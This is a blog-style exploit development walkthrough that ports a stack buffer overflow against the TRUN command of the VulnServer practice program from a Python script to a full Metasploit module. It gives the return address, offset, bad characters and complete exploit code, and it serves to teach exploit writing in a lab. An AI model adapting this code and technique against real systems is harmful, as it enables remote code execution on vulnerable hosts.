Porting VulnServer TRUN /.:/ exploit to Metasploit

Pre-requisites  : http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

Bof Template used : https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

I followed the bof tutorial using python 🙂

The python version of the exploit looks like

[cc lang=”python”]
import struct
import socket
ret=”\xAF\x11\x50\x62″ #625011AF JMP ESP essfunc.dll
nop=”\x90″*32
shellcode=(“\xCC\xCC\xCC”) #use your own Shellcode bad chars \x00\x0A\x0D
buffer= “A”*2003 + ret + nop + shellcode + “D”*636
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘127.0.0.1’,9999))
s.recv(1024)
s.send(‘TRUN /.:/’ + buffer)
s.close()
[/cc]

To port to Metasploit you need to think about the type of exploit it is…remote windows. [cc lang=”ruby”]class Metasploit3 < Msf::Exploit::Remote[/cc]
This means you will need a TCP connection. [cc lang=”ruby”]include Msf::Exploit::Remote::Tcp[/cc]
Default port number for vunserver is 9999 [cc lang=”ruby”]9999 Opt::RPORT(9999)[/cc]
Then you will need to think about the elements of the buffer. sploit 🙂
The starting “TRUN /.:/” command, then the junk space, in Metasploit NOPS are used instead of “A”* 2003 using make_nops()
Next we need to know the return address that will be inside EIP, this will be 0x625011AF from essfunc.dll, this is universal as it’s from the vunserver program dll.
[cc lang=”ruby”]
‘Targets’ =>
[
[‘Windows XP Universal’,
{ ‘Ret’ => 0x625011af, ‘Offset’ => 2003 } ],
],
[/cc]
In the ‘payload’ section we add the amount of space allowed for shellcode and the bad chars
[cc lang=”ruby”]
‘Payload’ =>
{
‘Space’ => 900,
‘BadChars’ => “\x00\x0A\x0D”,
},
[/cc]
Then we need to add a nop slide because the shellcode will need space in memory to decode. payload.encoded handles all the payload encoding and decoding in memory, so no decoding nops needed, they are added just incase.
Then the amount of space for shellcode, in this case it’s around 900 which is loads of space for shellcode
This makes the final sploit
[cc lang=”ruby”]

sploit = ‘TRUN /.:/’ + junk + [target.ret].pack(‘V’) + make_nops(32) + payload.encoded

[/cc]
This makes the Metasploit module:

[cc lang=”ruby”]
# Metasploit template from corelan.be
# BoF for vunserver thegreycorner.com
require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

include Msf::Exploit::Remote::Tcp # using TCP connection

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Vunserver stack overflow’,
‘Description’ => %q{
This module exploits a stack overflow in a
vulnserver.
},
‘Author’ => [ ‘Stephen Bradshaw’,’Duncan Winfrey’ ],
‘Version’ => ‘$Revision: 9999 $’,
‘References’ =>
[
[ ‘Vunserver’, ‘http://www.thegreycorner.com/p/vulnserver.html’ ],
[ ‘corelan.be’, ‘http://tinyurl.com/64s3je4’ ],
],

‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
},
‘Payload’ =>
{
‘Space’ => 500,
‘BadChars’ => “\x00\x0A\x0D”,
},
‘Platform’ => ‘win’,

‘Targets’ =>
[
[‘Windows XP Universal’,
{ ‘Ret’ => 0x625011af, ‘Offset’ => 2003 } ],
],
‘DefaultTarget’ => 0,

‘Privileged’ => false
))

register_options(
[
Opt::RPORT(9999)
], self.class)
end

def exploit
connect

junk = make_nops(target[‘Offset’])
sploit = ‘TRUN /.:/’ + junk + [target.ret].pack(‘V’) + make_nops(32) + payload.encoded
sock.put(sploit)

handler
disconnect

end

end
[/cc]

Then put the code into /opt/metasploit/msf3/modules/exploits/windows/misc as vun_server_bof.rb

Then tested it out 😀

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.